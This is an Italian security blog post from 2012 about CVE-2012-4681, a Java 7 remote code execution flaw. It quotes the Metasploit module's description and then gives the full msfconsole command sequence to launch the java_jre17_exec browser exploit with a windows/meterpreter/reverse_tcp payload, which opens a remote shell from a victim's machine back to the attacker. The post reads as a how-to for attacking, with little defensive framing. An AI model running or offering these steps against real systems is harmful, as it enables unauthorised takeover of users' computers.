ClsHack Blog


[CVE-2012-4681] Java 7 Remote Code Execution && Metasploit

September 2nd, 2012 by clshack


E’ da tanto che non parlo di qualche nuovo exploit disponibile sul nostro amico metasploit.

Ma è da poco uscita una nuova vulnerabilità per java che consente l’esecuzione di codice remoto senza autorizzazione.

La descrizione dell’exploit è la seguente:

This module exploits a vulnerability in Java 7, which allows an attacker to run
arbitrary Java code outside the sandbox. The vulnerability seems to be related to
the use of the newly introduced ClassFinder#resolveClass in Java 7, which allows
the sun.awt.SunToolkit class to be loaded and modified. Please note this flaw is
also being exploited in the wild, and there is no patch from Oracle at this point.
Our module has been successfully tested on multiple setups, including: IE, Firefox,
Chrome and Safari on Windows, Linux and OS X, etc.

Come avrete ben letto, nessun browser è al sicuro se la versione in uso di java è vulnerabile.
Nemmeno i diversi sistemi operativi potranno proteggervi.

Questo modulo non funziona con l’update u7 rilasciato da java per proteggere i vostri pc, ma rimane comunque vulnerabile ad una nuova variante del virus.
http://pastebin.com/zQZzMswr

Ecco come utilizzare l’exploit su metasploit:

sudo msfupdate

sudo msfconsole

use exploit/multi/browser/java_jre17_exec
set SRVHOST 192.168.1.100
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.100
exploit

Demo video:

CVE-2012-4681 Java 7 Applet RCE 0day Gondvv Linux Metasploit Demo

CVE-2012-4681 Java 7 Applet RCE 0day Gondvv Windows Metasploit Demo